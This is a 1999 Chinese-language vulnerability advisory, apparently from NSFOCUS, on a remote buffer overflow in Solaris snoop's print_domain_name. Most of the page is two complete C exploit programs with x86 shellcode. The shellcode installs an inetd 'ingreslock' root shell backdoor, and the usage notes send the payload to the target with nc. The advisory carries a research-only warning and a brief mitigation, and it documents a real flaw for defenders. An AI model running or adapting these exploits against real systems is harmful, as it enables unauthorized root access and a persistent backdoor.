首页 -> 安全研究

安全研究

安全漏洞
snoop (print_domain_name)缓存溢出

发布日期:1999-12-07
更新日期:1999-12-09

受影响系统:
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
Sun Solaris 2.3
描述:
Snoop是个类似tcpdump的程序,是用来查看网络流通量。在print_domain_name函数中,如果域名长度大于1024个字节将会产生溢出,利用此溢出漏洞,攻击者可以以运行snoop(通常为root)的身份远程进入系统。

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

检验程序发布过两个版本:

(1)需要snoop使用-v参数来运行。

/*

Remote Solaris 2.7 x86 snoop exploit
Run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop -v"
Thanks str/horizon for shellcodes (hi plaguez)

*/



#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop=0x90;
long nop=NOPDEF, esp=0x8047344, offset=DEFOFF;

int main (int argc, char *argv[])
{
int i;

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);

memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));

for (i = nop+strlen(shell); i < SIZE-4; i += 4)
*((int *) &buffer[i]) = esp+offset;

fprintf(stderr,"0x%x\n", esp+offset);
printf("%s", buffer);

return 0;
}

(2)只要运行了snoop。

/*

by: K2,
version .2
this is a funny Solaris.
remote Solaris 2.7 x86 snoop exploit
rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
run with ( ./snp ) | nc -u target_host_network 53
requires target host to be running "snoop"
verified with patch 108483-01
thx str/horizon for shellcodes.Hi plageuz
Hi mom.

*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"
"stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop=0x90;
long nop=NOPDEF,esp=0x804646c;
long offset=DEFOFF;

char buffer[SIZE];

int main (int argc, char *argv[]) {
int i;

if (argc > 1) offset += strtol(argv[1], NULL, 0);
if (argc > 2) nop += strtoul(argv[2], NULL, 0);

memset(buffer, x86_nop, SIZE);
memcpy(buffer+nop, shell, strlen(shell));
for (i = nop+strlen(shell); i < SIZE-4; i += 4) {
*((int *) &buffer[i]) = esp+offset;

}

fprintf(stderr,"0x%x\n",esp+offset);
printf("%s", buffer);

return 0;
}

建议:
临时的解决办法就是不使用snoop,或用tcpdump来代替。
(注:SUN发布的关于snoop的补丁不是针对此问题)

浏览次数:7331
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障